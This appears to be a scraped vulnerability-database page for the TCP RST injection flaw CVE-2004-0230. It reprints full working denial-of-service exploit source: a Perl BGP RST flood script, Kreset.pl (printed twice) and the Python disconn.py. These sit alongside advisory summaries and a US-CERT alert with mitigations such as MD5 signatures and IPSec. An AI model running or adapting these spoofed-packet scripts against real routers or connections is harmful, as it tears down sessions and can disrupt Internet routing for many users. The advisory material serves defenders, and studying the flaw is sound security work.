# Sends out RST flood to DOS BGP Connections
#
# Requires getopts.pl and Net:RawIP (http://www.ic.al.lg.ua/~ksv/)
#
#For this to work you must do a preceding scan to figure out what the source port and sequence number should be!
#Cisco routers have a magic source port after reboot and all subsequent source ports are incremented by 1 or 512 depending on IOS
#And also find out the hops to set the ttl w/ traceroute.  Per the RFC, the TTL must be 1 when it arrives at the router.
#
#

require 'getopts.pl';
use Net::RawIP;
Getopts('s:p:d:t:x');
$a = new Net::RawIP;
die "Usage $0 -s <spoofed source> -p <source port> -d <destination> -t <ttl>" unless ($opt_s && $opt_p && $opt_d && $opt_t);

$count=0;

while ($count < 4294967296) {

#Increment the count
                $count=$count + 16384;

#Create IP packet!
                $a->set({ ip => 
                        {saddr => $opt_s,
                        daddr => $opt_d,
                        ttl => $opt_t
                        },
#Another TCP port could be specified here to do DOSes on other TCP services.  BGP is 179
                        tcp=> {dest => 179,
                        source => $opt_p,
                        window =>  16384,
                        seq => $count,
                        rst => 1}
                        });
#Send it out!
                $a->send;
}		

- 漏洞信息 (24032)

Multiple Vendor TCP Sequence Number Approximation Vulnerability (3) (EDBID:24032)
multiple remote
2004-04-20 Verified
0 Paul Watson
N/A [点击下载]
source: http://www.securityfocus.com/bid/10183/info
  
A vulnerability in TCP implementations may permit unauthorized remote users to reset TCP sessions. This issue affects products released by multiple vendors. Exploiting this issue may permit remote attackers to more easily approximate TCP sequence numbers.
  
The problem is that affected implementations will accept TCP sequence numbers within a certain range of the expected sequence number for a packet in the session. This will permit a remote attacker to inject a SYN or RST packet into the session, causing it to be reset and effectively allowing denial-of-service attacks. An attacker would exploit this issue by sending a packet to a receiving implementation with an approximated sequence number and a forged source IP and TCP port.
  
Few factors may present viable target implementations, such as imlementations that:
  
- depend on long-lived TCP connections
- have known or easily guessed IP address endpoints
- have known or easily guessed TCP source ports.
  
Note that Border Gateway Protocol (BGP) is reported to be particularly vulnerable to this type of attack. As a result, this issue is likely to affect a number of routing platforms.
  
Note also that while a number of vendors have confirmed this issue in various products, investigations are ongoing and it is likely that many other vendors and products will turn out to be vulnerable as the issue is investigated further.
  
Other consequences may also result from this issue, such as injecting specific data in TCP sessions, but this has not been confirmed.
  
**Update: Microsoft platforms are also reported prone to this vulnerability. Vendor reports indicate that an attacker will require knowledge of the IP address and port numbers of the source and destination of an existent legitimate TCP connection in order to exploit this vulnerability on Microsoft platforms. Connections that involve persistent sessions, for example Border Gateway Protocol sessions, may be more exposed to this vulnerability than other TCP/IP sessions.

http://www.exploit-db.com/sploits/24032.tgz		

- 漏洞信息 (24033)

Multiple Vendor TCP Sequence Number Approximation Vulnerability (4) (EDBID:24033)
multiple remote
2004-04-23 Verified
0 K-sPecial
N/A [点击下载]
source: http://www.securityfocus.com/bid/10183/info
   
A vulnerability in TCP implementations may permit unauthorized remote users to reset TCP sessions. This issue affects products released by multiple vendors. Exploiting this issue may permit remote attackers to more easily approximate TCP sequence numbers.
   
The problem is that affected implementations will accept TCP sequence numbers within a certain range of the expected sequence number for a packet in the session. This will permit a remote attacker to inject a SYN or RST packet into the session, causing it to be reset and effectively allowing denial-of-service attacks. An attacker would exploit this issue by sending a packet to a receiving implementation with an approximated sequence number and a forged source IP and TCP port.
   
Few factors may present viable target implementations, such as imlementations that:
   
- depend on long-lived TCP connections
- have known or easily guessed IP address endpoints
- have known or easily guessed TCP source ports.
   
Note that Border Gateway Protocol (BGP) is reported to be particularly vulnerable to this type of attack. As a result, this issue is likely to affect a number of routing platforms.
   
Note also that while a number of vendors have confirmed this issue in various products, investigations are ongoing and it is likely that many other vendors and products will turn out to be vulnerable as the issue is investigated further.
   
Other consequences may also result from this issue, such as injecting specific data in TCP sessions, but this has not been confirmed.
   
**Update: Microsoft platforms are also reported prone to this vulnerability. Vendor reports indicate that an attacker will require knowledge of the IP address and port numbers of the source and destination of an existent legitimate TCP connection in order to exploit this vulnerability on Microsoft platforms. Connections that involve persistent sessions, for example Border Gateway Protocol sessions, may be more exposed to this vulnerability than other TCP/IP sessions.

use Net::RawIP;
## Kreator -> K-sPecial [http://xzziroz.freeshell.org]
## Date -> 4-23-2004
## Name -> Kreset.pl
## Version -> 1.0
##
## Use -> Used to reset a TCP connecting.
## (Using the slipping throught he window meathod described on 4-20-04)
## DESCRIBED HERE: http://www.uniras.gov.uk/vuls/2004/236929/index.htm
##
## Usage -> If you don't fuckin know how to use it, don't use it.
##
## Other -> I played around on nix for a few hours to get the idea down
## pat. I set up an IRCD and connected to it, looked at tcpdump to
## get irssi's local port. irssi's window size was larger so I figured
## i would pretend to be sending RST from server, irssi window 
## was around
## 30K while ircd window around 3K, big difference :D. So I enter values
## and since the connection is loop back, i used 0.0 seconds between
## packets.
## it only took a few minutes to disconnect with a 0.0 overlay and
## a 30K window starting at sequence number 0. Only problem over
## the internet, is finding the port of each side, sure you know the
## servers port but not the clients. I got to sequence number 1512500
## using a .10 second delay and a window size of 2500. Sequence 
## numbers are 
## 32 bit numbers, 32 1's comes out to be 4294967295. 
## Do the math, and you know precisely how long it takes to cover
## every sequence RANGE of a given port using a given window size.
## Window sizes should be based on application layer program.
##
## NOTE -> This script assumes you know at least one of the ports, 
## if the case is otherwise
## then the script can easily be modified to work around this. Also,
## this was written for
## UNIX variants.

print <<EOF;
-> Kreset.pl by K-sPecial [4-23-2004]
-> Used to reset a connection based on the slipping
-> through the window meathod, exploited publicly on 4-20-2004.
-> [http://xzziroz.freeshell.org]
-> Greets: K-sPecial (myself), saevio, attila, zeedo, uzimonkey
-> eightball, unmanarc, Buuyo^, and whomever else I forgot. 
EOF

print "\r\nDo you want a port range for the source IP, or the dest IP?";
print "\r\nIf you want it for the source, type 1, otherwise 2.";
print "\r\nIf you don't want it for either, type one or the other: ";
chomp (my $choice = <STDIN>);
unless ($choice == 1 || $choice == 2) { 
	print "\r\nEnter 1, or 2.\r\n";
	exit(1);
}
print "\r\nEnter source IP: ";
chomp (my $sip = <STDIN>);
if ($choice == 2) { 
	print "\r\nEnter source port: ";
	chomp ($sport = <STDIN>);
	if (!($sport)) { 
		print "\r\nYou must fill in a source port.\r\n";
	}
}
print "\r\nEnter dest IP: ";
chomp (my $dip = <STDIN>);
if ($choice == 1) { 
	print "\r\nEnter dest port: ";
	chomp ($dport = <STDIN>);
	if (!($dport)) { 
		print "\r\nYou must fill in a destination port.\r\n";
		exit(1);
	}
}
print "\r\nEnter begin port: ";
chomp (my $bport = <STDIN>);
print "\r\nEnter end port: ";
chomp (my $eport = <STDIN>);
if (!($sip) || !($dip) || !($bport) || !($eport)) {
	print "\r\nYou forgot to fill in one or more fields.\r\n";
	exit(1); ## Yea hahah we don't exit (0) anymore. LOL
}
print "\r\nDestinations guessed window size,";
print "\r\nIf you don't define this, we will try small (2500): ";
chomp (my $winsize = <STDIN>); ## Why did the window cross the road?
if (!($winsize)) {
	$winsize = 2500;
}
print "\r\nStarting sequence number,";
print "\r\nIf you don't define this, we will start at 0: ";
chomp (my $seqnum = <STDIN>); ## So he could prevent sequence numbers
if (!($seqnum)) {	      ## from getting through!
	$seqnum = 0;
}

print "\r\nNumber of seconds to wait between each packet sent,";
print "\r\nENTER DOTTED DECIMALS HERE PRECEEDED BY A 0 TO";
print "\r\nINDICATE NO MINUTES: 0.10 == 10 ms, 0.0 = 0 ms";
print "\r\nIf you don't define this, we will use 0.10: ";
chomp (my $ms = <STDIN>);
if (!($ms)) {
	$ms = "0.10";
}

print <<EOF;

Source IP is -> $sip
Source port is -> $sport
Destination IP is -> $dip
Guessed window size is -> $winsize
Starting sequence number is -> $seqnum
Loop wait is -> $ms
Begin port is -> $bport
End port is -> $eport
EOF
print "Destination port is -> $dport\r\n" if $dport;
print "Source port is -> $sport\r\n" if $sport;
print "\r\n";

my $i = $seqnum;
## LOOKS WHATS FOLLOWS! WES ARES SO LEETS WITHS OURS SELECTS TRICKSES!
## P.S K-sPecial's hopes yours usings a nix variants or this selects
## tricks just mights nots works.
for ($i; 1; $i += $winsize) { 
	if ($i > 4294967295) { 
		$bport++;
		if ($bport > $eport) { 
			print "Finished\r\n";
			exit(0);
		}
		else {
			print "Looping next port.\r\n";
			$i = $seqnum;
			sleep(2);
			next;
		}
	}
	if ($choice == 2) { 
		$dport = $bport;
	}
	else { 
		$sport = $bport;
	}
	
	select(undef, undef, undef, $ms);
	print "Sequence Number is -> $i port is -> $bport\r\n";

	 $a = new Net::RawIP;
         $a->set({ip => {saddr => "$sip",daddr => "$dip"},
                  tcp => {source => $sport,dest => $dport,rst => 1,
		  syn => 1, seq => $i}}) ;


$a->send;
}
		

- 漏洞信息 (F38708)

tcprst.c (PacketStormID:F38708)
2005-07-15 00:00:00
Marcin Ulikowski  
denial of service,tcp
CVE-2004-0230
[点击下载]

tcprst.c resets established TCP connections by sending suitable TCP packets with the RST (reset) flag set. Makes use of the known TCP vulnerability that accepts RST packets with ISNs that are in a certain window, making the attack much easier.

- 漏洞信息 (F33243)

autoRST.c (PacketStormID:F33243)
2004-05-04 00:00:00
Matt Edman  
exploit,tcp
CVE-2004-0230
[点击下载]

autoRST is an automated TCP RST exploit. It uses the Winpcap libraries to sniff for TCP packets on a network and then sends out a forged RST packet after calculating the appropriate sequence number and forging the MAC address. Makes use of the recent vulnerable released by Paul A. Watson.

- 漏洞信息 (F33202)

tcp_reset.c (PacketStormID:F33202)
2004-04-28 00:00:00
eazy  
exploit,tcp,proof of concept
CVE-2004-0230
[点击下载]

Sample proof of concept exploit that demonstrates the TCP vulnerability discovered by Paul A. Watson.

- 漏洞信息 (F33185)

disconn.py (PacketStormID:F33185)
2004-04-28 00:00:00
Michael Gschwandtner  anyplay.tznetz.com
exploit,tcp,proof of concept,python
CVE-2004-0230
[点击下载]

Sample proof of concept exploit that demonstrates the TCP vulnerability discovered by Paul A. Watson. Python version.

#!/usr/bin/python
#
# Version: 1.1
# Copyright 2004 r3d5un
#
# disconn.py is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# disconn.py is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with disconn.py; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
#
# Version 1.1 changes: 
#            -se option added (Sequence End). This allows the
#            user to specify an upper sequnece number, and thus
#            the distribution to more clients.
#
#            i.e 4 Hosts 0-1000000000 1000000001-2000000000 
#            2000000001-3000000000 3000000001-4294967295
#
#
#

import btk
import sys
import string

def cmdParser(args):
        pos = 1
        quiet = False
        seq = 0
        maxseqnum = 4294967295
	win = 8000
        running = True
        while running:
                running = False
                if args[pos] == "-s":
                        try:
                                seq = long(args[pos+1])
                                pos = pos + 2
                                running = True
                        except:
                                pos = pos + 1
		if args[pos] == "-se":
			try:
				maxseqnum = long(args[pos+1])
				pos = pos + 2
				running = True
			except:
				pos = pos +1
                elif args[pos] == "-w":
                        try:
                                win = long(args[pos+1])
                                pos = pos + 2
                                running = True
                        except:
                                pos = pos + 1

                elif args[pos] == "-q":
                        quiet = True
                        running = True
                        pos = pos + 1

        dstip = args[pos]
        dstport = int(args[pos+1])
        srcip = args[pos+2]
        tmp = string.split(args[pos+3],":")
        try:
                srcport1 = int(tmp[0])
                srcport2 = int(tmp[1])
        except:
                srcport1 = srcport2 = int(tmp[0])

        return dstip,dstport,srcip,srcport1,srcport2,seq,maxseqnum,win,quiet



try:
        args = sys.argv
        dstip,dstport,srcip,srcport1,srcport2,seqnum,maxseqnum,win,quiet = cmdParser(args)
        
        if not quiet:
                print "Attacking " + dstip + " <--> " + srcip

        packet = btk.btk()
        packet.protocol(btk.TCP)
        packet.flags(btk.RST | btk.ACK)
        
        i = seqnum
        k = 0
        while i < maxseqnum:
                packet.options(seq=long(i))
                packet.options(ack=long(i))
                for p in range (srcport1, srcport2+1):
                        packet.send(dstip,dstport,srcip,p)
                k=(k+1)%1000
                if k == 0:
                        if not quiet:
                                print "1000 Packets sent (seqnum="+str(i)+")"
                i = i + win
except:
        print "Usage: disconn.py [-q] [-s <seqnum>] [-se <endseqnum>] [-w <windowsize>] <dst.ip> <dst.port> <src.ip> <src.port>\n" 

    

- 漏洞信息 (F33182)

Kreset.pl (PacketStormID:F33182)
2004-04-25 00:00:00
K-sPecial  xzziroz.freeshell.org
exploit,perl,tcp,proof of concept
CVE-2004-0230
[点击下载]

Sample proof of concept exploit that demonstrates the TCP vulnerability discovered by Paul A. Watson. Perl version.

Well, I thought I was the first to release some of this but i see places like k-otik already have some C code. Here is some perl code that will reset a connection, it takes a port range that can be used as the source IP's port range, or the destination ip's port range (it assumes you at least no the port of one side of the connection).

Contrib congrats at la la kaiten....

Peace goes out to my dawgs, saevio (ya i still love you, you little hoe), attila, uzimonkey, zeedo, eightball, I won't even mention idiocy and AlienDaemon... anyway.. here it is :)

-----

use Net::RawIP;
## Kreator -> K-sPecial [http://xzziroz.freeshell.org]
## Date -> 4-23-2004
## Name -> Kreset.pl
## Version -> 1.0
##
## Use -> Used to reset a TCP connecting.
## (Using the slipping throught he window meathod described on 4-20-04)
## DESCRIBED HERE: http://www.uniras.gov.uk/vuls/2004/236929/index.htm
##
## Usage -> If you don't fuckin know how to use it, don't use it.
##
## Other -> I played around on nix for a few hours to get the idea down
## pat. I set up an IRCD and connected to it, looked at tcpdump to
## get irssi's local port. irssi's window size was larger so I figured
## i would pretend to be sending RST from server, irssi window 
## was around
## 30K while ircd window around 3K, big difference :D. So I enter values
## and since the connection is loop back, i used 0.0 seconds between
## packets.
## it only took a few minutes to disconnect with a 0.0 overlay and
## a 30K window starting at sequence number 0. Only problem over
## the internet, is finding the port of each side, sure you know the
## servers port but not the clients. I got to sequence number 1512500
## using a .10 second delay and a window size of 2500. Sequence 
## numbers are 
## 32 bit numbers, 32 1's comes out to be 4294967295. 
## Do the math, and you know precisely how long it takes to cover
## every sequence RANGE of a given port using a given window size.
## Window sizes should be based on application layer program.
##
## NOTE -> This script assumes you know at least one of the ports, 
## if the case is otherwise
## then the script can easily be modified to work around this. Also,
## this was written for
## UNIX variants.

print <<EOF;
-> Kreset.pl by K-sPecial [4-23-2004]
-> Used to reset a connection based on the slipping
-> through the window meathod, exploited publicly on 4-20-2004.
-> [http://xzziroz.freeshell.org]
-> Greets: K-sPecial (myself), saevio, attila, zeedo, uzimonkey
-> eightball, unmanarc, Buuyo^, and whomever else I forgot. 
EOF

print "\r\nDo you want a port range for the source IP, or the dest IP?";
print "\r\nIf you want it for the source, type 1, otherwise 2.";
print "\r\nIf you don't want it for either, type one or the other: ";
chomp (my $choice = <STDIN>);
unless ($choice == 1 || $choice == 2) { 
	print "\r\nEnter 1, or 2.\r\n";
	exit(1);
}
print "\r\nEnter source IP: ";
chomp (my $sip = <STDIN>);
if ($choice == 2) { 
	print "\r\nEnter source port: ";
	chomp ($sport = <STDIN>);
	if (!($sport)) { 
		print "\r\nYou must fill in a source port.\r\n";
	}
}
print "\r\nEnter dest IP: ";
chomp (my $dip = <STDIN>);
if ($choice == 1) { 
	print "\r\nEnter dest port: ";
	chomp ($dport = <STDIN>);
	if (!($dport)) { 
		print "\r\nYou must fill in a destination port.\r\n";
		exit(1);
	}
}
print "\r\nEnter begin port: ";
chomp (my $bport = <STDIN>);
print "\r\nEnter end port: ";
chomp (my $eport = <STDIN>);
if (!($sip) || !($dip) || !($bport) || !($eport)) {
	print "\r\nYou forgot to fill in one or more fields.\r\n";
	exit(1); ## Yea hahah we don't exit (0) anymore. LOL
}
print "\r\nDestinations guessed window size,";
print "\r\nIf you don't define this, we will try small (2500): ";
chomp (my $winsize = <STDIN>); ## Why did the window cross the road?
if (!($winsize)) {
	$winsize = 2500;
}
print "\r\nStarting sequence number,";
print "\r\nIf you don't define this, we will start at 0: ";
chomp (my $seqnum = <STDIN>); ## So he could prevent sequence numbers
if (!($seqnum)) {	      ## from getting through!
	$seqnum = 0;
}

print "\r\nNumber of seconds to wait between each packet sent,";
print "\r\nENTER DOTTED DECIMALS HERE PRECEEDED BY A 0 TO";
print "\r\nINDICATE NO MINUTES: 0.10 == 10 ms, 0.0 = 0 ms";
print "\r\nIf you don't define this, we will use 0.10: ";
chomp (my $ms = <STDIN>);
if (!($ms)) {
	$ms = "0.10";
}

print <<EOF;

Source IP is -> $sip
Source port is -> $sport
Destination IP is -> $dip
Guessed window size is -> $winsize
Starting sequence number is -> $seqnum
Loop wait is -> $ms
Begin port is -> $bport
End port is -> $eport
EOF
print "Destination port is -> $dport\r\n" if $dport;
print "Source port is -> $sport\r\n" if $sport;
print "\r\n";

my $i = $seqnum;
## LOOKS WHATS FOLLOWS! WES ARES SO LEETS WITHS OURS SELECTS TRICKSES!
## P.S K-sPecial's hopes yours usings a nix variants or this selects
## tricks just mights nots works.
for ($i; 1; $i += $winsize) { 
	if ($i > 4294967295) { 
		$bport++;
		if ($bport > $eport) { 
			print "Finished\r\n";
			exit(0);
		}
		else {
			print "Looping next port.\r\n";
			$i = $seqnum;
			sleep(2);
			next;
		}
	}
	if ($choice == 2) { 
		$dport = $bport;
	}
	else { 
		$sport = $bport;
	}
	
	select(undef, undef, undef, $ms);
	print "Sequence Number is -> $i port is -> $bport\r\n";

	 $a = new Net::RawIP;
         $a->set({ip => {saddr => "$sip",daddr => "$dip"},
                  tcp => {source => $sport,dest => $dport,rst => 1,
		  syn => 1, seq => $i}}) ;


$a->send;
}



_____________________________________________________________
Fight the power!  BlazeMail.com
    

- 漏洞信息 (F33174)

bgp-dosv2.pl (PacketStormID:F33174)
2004-04-24 00:00:00
Rich Compton  
exploit,denial of service,proof of concept
CVE-2004-0230
[点击下载]

BGP proof of concept denial of service utility that sends out a RST flood to BGP connection providing the attacker has already gained knowledge of the source port and sequence number.

- 漏洞信息 (F33173)

ttt-1.3r.tar.gz (PacketStormID:F33173)
2004-04-24 00:00:00
Cisco Systems Critical Infrastructure Assurance Group  cisco.com
arbitrary,tcp
cisco
CVE-2004-0230
[点击下载]

Modified version of Cisco CIAG's TCP Test Tool ttt. This tool can generate TCP segments with arbitrary values for any field in the IP or TCP headers. A TCP payload can be added to the segment by specifying the file with the payload in the command line or by passing the payload via standard input.

- 漏洞信息 (F33172)

reset-tcp_rfc31337-compliant.c (PacketStormID:F33172)
2004-04-23 00:00:00
Paul A. Watson  terrorist.net
exploit,tcp,proof of concept
CVE-2004-0230
[点击下载]

Sample proof of concept exploit that demonstrates the TCP vulnerability discovered by Paul A. Watson. Some modifications done by J 'Swoop' Barber.

- 漏洞信息 (F33171)

reset-tcp.c (PacketStormID:F33171)
2004-04-23 00:00:00
Paul A. Watson  terrorist.net
exploit,tcp,proof of concept
CVE-2004-0230
[点击下载]

Sample proof of concept exploit that demonstrates the TCP vulnerability discovered by Paul A. Watson.

- 漏洞信息 (F33170)

SlippingInTheWindow_v1.0.doc (PacketStormID:F33170)
2004-04-23 00:00:00
Paul A. Watson  terrorist.net
paper,tcp,protocol
CVE-2004-0230
[点击下载]

Full whitepaper by Paul (Tony) Watson entitled Slipping in the Window: TCP Reset Attacks.

- 漏洞信息 (F33169)

SlippingInTheWindow_v1.0.ppt (PacketStormID:F33169)
2004-04-23 00:00:00
Paul A. Watson  terrorist.net
paper,tcp,protocol
CVE-2004-0230
[点击下载]

Powerpoint presentation by Paul (Tony) Watson entitled Slipping in the Window: TCP Reset Attacks. This presentation was original given at CanSecWest 2004.

- 漏洞信息 (F33143)

Technical Cyber Security Alert 2004-111A (PacketStormID:F33143)
2004-04-23 00:00:00
US-CERT  cert.org
advisory,remote,denial of service,tcp,protocol
CVE-2004-0230
[点击下载]

Technical Cyber Security Alert TA04-111A - Most implementations of the Border Gateway Protocol (BGP) rely on the Transmission Control Protocol (TCP) to maintain persistent unauthenticated network sessions. There is a vulnerability in TCP which allows remote attackers to terminate network sessions. Sustained exploitation of this vulnerability could lead to a denial of service condition; in the case of BGP systems, portions of the Internet community may be affected. Routing operations would recover quickly after such attacks ended.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

   Technical Cyber Security Alert TA04-111A archive 

Vulnerabilities in TCP

   Original release date: April 20, 2004
   Last revised: --
   Source: US-CERT

Systems Affected

     * Systems that rely on persistent TCP connections, for example
       routers supporting BGP

Overview

   Most implementations of the Border Gateway Protocol (BGP) rely on the
   Transmission Control Protocol (TCP) to maintain persistent
   unauthenticated network sessions. There is a vulnerability in TCP
   which allows remote attackers to terminate network sessions. Sustained
   exploitation of this vulnerability could lead to a denial of service
   condition; in the case of BGP systems, portions of the Internet
   community may be affected. Routing operations would recover quickly
   after such attacks ended.

I. Description

   In 2001, the CERT Coordination Center released CA-2001-09, describing
   statistical weaknesses in various TCP/IP Initial Sequence generators.
   In that document (<http://www.cert.org/advisories/CA-2001-09.html>),
   it was noted by Tim Newsham:

     [I]f a sequence number within the receive window is known, an
     attacker can inject data into the session stream or terminate the
     connection. If the ISN value is known and the number of bytes sent
     already sent is known, an attacker can send a simple packet to
     inject data or kill the session. If these values are not known
     exactly, but an attacker can guess a suitable range of values, he
     can send out a number of packets with different sequence numbers in
     the range until one is accepted. The attacker need not send a
     packet for every sequence number, but can send packets with
     sequence numbers a window-size apart. If the appropriate range of
     sequence numbers is covered, one of these packets will be accepted.
     The total number of packets that needs to be sent is then given by
     the range to be covered divided by the fraction of the window size
     that is used as an increment.

   Paul Watson has performed the statistical analysis of this attack
   when the ISN is not known and has pointed out that such an attack
   could be viable when specifically taking into account the TCP
   Window size. He has also created a proof-of-concept tool
   demonstrating the practicality of the attack. The National
   Infrastructure Security Co-Ordination Centre (NISCC) has published
   an advisory summarizing Paul Watson's analysis in "NISCC
   Vulnerability Advisory 236929," available at
   <http://www.uniras.gov.uk/vuls/2004/236929/index.htm>.

   Since TCP is an insecure protocol, it is possible to inject
   transport-layer packets into sessions between hosts given the right
   preconditions. The TCP/IP Initial Sequence Number vulnerability
   (http://www.kb.cert.org/vuls/id/498440) referenced in CA-2001-09 is
   one example of how an attacker could inject TCP packets into a
   session. If an attacker were to send a Reset (RST) packet for
   example, they would cause the TCP session between two endpoints to
   terminate without any further communication.

   The Border Gateway Protocol (BGP) is used to exchange routing
   information for the Internet and is primarily used by Internet
   Service Providers (ISPs). For detailed information about BGP and
   some tips for securing it, please see Cisco System's documentation
   (<http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/bgp.htm>
   or Team Cymru (<http://www.cymru.com/>). A vulnerable situation
   arises due to the fact that BGP relies on long-lived persistent TCP
   sessions with larger window sizes to function. When a BGP session
   is disrupted, the BGP application restarts and attempts to
   re-establish a connection to its peers. This may result in a brief
   loss of service until the fresh routing tables are created.

   In a TCP session, the endpoints can negotiate a TCP Window size. When
   this is taken into account, instead of attempting to send a spoofed
   packet with all potential sequence numbers, the attacker would only
   need to calculate an valid sequence number that falls within the next
   expected ISN plus or minus half the window size. Therefore, the larger
   the TCP Window size, the the larger the range of sequence numbers that
   will be accepted in the TCP stream. According to Paul Watson's report,
   with a typical xDSL data connection (80 Kbps, upstream) capable of
   sending of 250 packets per second (pps) to a session with a TCP Window
   size of 65,535 bytes, it would be possible to inject a TCP packet
   approximately every 5 minutes. It would take approximately 15 seconds
   with a T-1 (1.544 Mbps) connection. These numbers are significant when
   large numbers of compromised machines (often called "botnets" or
   "zombies") can be used to generate large amounts of packets that can
   be directed at a particular host.

   To protect against such injections, RFC 2385 provides a method of
   using MD5 signatures on the TCP Headers. If this form of verification
   is supported and enabled between two peers, then an attacker would
   have to obtain the key used to transmit the packet in order to
   successfully inject a packet into the TCP session. Another alternative
   would be to tunnel BGP over IPSec. Again, this would provide a form of
   authentication between the BGP peers and the data that they transmit.
   The lack of authentication when using TCP for BGP makes this type of
   attack more viable.

   US-CERT is tracking this issue as VU#415294. This reference number
   corresponds to CVE candidate CAN-2004-0230. NISCC is tracking this
   issue as Advisory 236929.

II. Impact

   Sustained exploitation of the TCP injection vulnerability with regard
   to the BGP vulnerability could lead to a denial-of-service condition
   that could affect a large segment of the Internet community. Normal
   operations would most likely resume shortly after the attack stopped.

   Since the TCP/IP Initial Sequence Number vulnerability (VU#498440) has
   been proven more viable of an attack, any services or sites that rely
   on persistent TCP sessions could also be affected by this
   vulnerability. Impacts could range from data corruption or session
   hijacking to a denial-of-service condition.

III. Solution

Apply a patch from your vendor

   Please see you vendor's statement regarding the availability of
   patches, updates and mitigation strategies.

Workaround

Deploy and Use Cryptographically Secure Protocols

   TCP initial sequence numbers were not designed to provide proof
   against TCP connection attacks. The lack of cryptographically-strong
   security options for the TCP header itself is a deficiency that
   technologies like IPSec try to address. It must be noted that in the
   final analysis that if an attacker has the ability to see unencrypted
   TCP traffic generated from a site, that site is vulnerable to various
   TCP attacks - not just those mentioned here. A stronger measure that
   would aid in protecting against such TCP attacks is end-to-end
   cryptographic solutions like those outlined in various IPSec
   documents.

   The key idea with an end-to-end cryptographic solution is that there
   is some secure verification that a given packet belongs in a
   particular stream. However, the communications layer at which this
   cryptography is implemented will determine its effectiveness in
   repelling ISN based attacks. Solutions that operate above the
   Transport Layer (OSI Layer 4), such as SSL/TLS and SSH1/SSH2, only
   prevent arbitrary packets from being inserted into a session. They are
   unable to prevent a connection reset (denial of service) since the
   connection handling will be done by a lower level protocol (i.e.,
   TCP). On the other hand, Network Layer (OSI Layer 3) cryptographic
   solutions such as IPSec prevent both arbitrary packets entering a
   transport-layer stream and connection resets because connection
   management is directly integrated into the secure Network Layer
   security model.

   The solutions presented above have the desirable attribute of not
   requiring any changes to the TCP protocol or implementations to be
   made. Some sites may want to investigate hardening the TCP transport
   layer itself. RFC2385 ("Protection of BGP Sessions via the TCP MD5
   Signature Option") and other technologies provide options for adding
   cryptographic protection within the TCP header at the cost of some
   potential denial of service, interoperability, and performance issues.

Ingress filtering

   Ingress filtering manages the flow of traffic as it enters a network
   under your administrative control. You can configure your BGP routers
   to only accept packets on a specific network connection. Servers are
   typically the only machines that need to accept inbound connections
   from the public Internet. In the network usage policy of many sites,
   there are few reasons for external hosts to initiate inbound
   connections to machines that provide no public services. Thus, ingress
   filtering should be performed at the border to prohibit externally
   initiated inbound connections to non-authorized services. In this
   fashion, the effectiveness of many intruder scanning techniques can be
   dramatically reduced.

Network Isolation

   Complex networks can benefit by separating data channels and control
   channels, such as BGP, into different logical or physical networks.
   Technologies such as VLANs, VPNs, leased links, NAT may all be able to
   contribute to separating the tranmission of control information from
   the transmission of the data stream.

Egress filtering

   Egress filtering manages the flow of traffic as it leaves a network
   under your administrative control. There is typically limited need for
   machines providing public services to initiate outbound connections to
   the Internet.

   In the case of BGP, only your BGP routers should be establishing
   connections to your peers. Other BGP traffic generated on your network
   could be a sign of an attempted attack.

Appendix A. Vendor Information

   For vendor information, please see NISCC Vulnerability Advisory 236929
   "Vulnerability Issues in TCP"
   (http://www.uniras.gov.uk/vuls/2004/236929/index.htm) or Vulnerability
   Note VU#415294 (http://www.kb.cert.org/vuls/id/415294#systems. As
   vendors report new information to US-CERT, we will update the
   vulnerability note. If a particular vendor is not listed in either the
   NISCC advisory, or the vulnerability, we recommend that you contact
   them for their comments.
     _________________________________________________________________

   US-CERT thanks Paul Watson, Cisco Systems and NISCC for notifying us
   about this problem and for helping us to construct this advisory.
     _________________________________________________________________

   Feedback can be directed to the US-CERT Technical Staff.
     _________________________________________________________________

   Copyright 2004 Carnegie Mellon University. Terms of use

   Revision History

   April 20, 2004: Initial release
   Last updated April 20, 2004 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQFAhXn2XlvNRxAkFWARAjKIAKDPl3a6RADvUASZJnIz5MAolUygqACgvUXz
crcQkqHTAxSVkcKnMMYLYU0=
=54p4
-----END PGP SIGNATURE-----
    

- 漏洞信息 (F33160)

Cisco Security Advisory 20040420-tcp-ios (PacketStormID:F33160)
2004-04-22 00:00:00
Cisco Systems  cisco.com
advisory,tcp
cisco
CVE-2004-0230
[点击下载]

Cisco Security Advisory: Multiple IOS based Cisco products are susceptible to the TCP vulnerability that allows an attacker easier exploitation of reseting an established connection. All Cisco products which contain a TCP stack are susceptible to this vulnerability. Huge list included.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory:    

- 漏洞信息 (F33159)

Cisco Security Advisory 20040420-tcp-nonios (PacketStormID:F33159)
2004-04-22 00:00:00
Cisco Systems  cisco.com
advisory,tcp
cisco
CVE-2004-0230
[点击下载]

Cisco Security Advisory: Multiple non-IOS based Cisco products are susceptible to the TCP vulnerability that allows an attacker easier exploitation of reseting an established connection. All Cisco products which contain a TCP stack are susceptible to this vulnerability. Huge list included.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory:    

- 漏洞信息 (F33153)

reset.zip (PacketStormID:F33153)
2004-04-22 00:00:00
Aphex  iamaphex.cjb.net
exploit,tcp
CVE-2004-0230
[点击下载]

This program will reset a TCP connection by guessing a valid sequence number.

- 漏洞信息 (F33152)

246929.html (PacketStormID:F33152)
2004-04-22 00:00:00
 
advisory,denial of service,tcp,protocol
CVE-2004-0230
[点击下载]

NISCC Vulnerability Advisory 236929 - Vulnerability Issues in TCP. The vulnerability described in this advisory affects implementations of the Transmission Control Protocol (TCP) that comply with the Internet Engineering Task Force's

- 漏洞信息

13619
SCO UnixWare / OpenServer TCP RST Injection DoS
Denial of Service
Loss of Availability
Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-02-07 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

